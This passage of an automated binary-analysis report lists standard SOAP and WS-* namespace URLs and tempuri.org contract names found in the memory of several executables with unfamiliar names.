Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.724618410.00000000028F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.751301963.0000000003431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: safert44.exe, 00000018.00000002.756456423.0000000003844000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.746495285.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15V
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.756456423.0000000003844000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: safert44.exe, 00000018.00000002.746495285.00000000036B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16V
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.761032896.0000000003633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.761032896.0000000003633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.761032896.0000000003633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
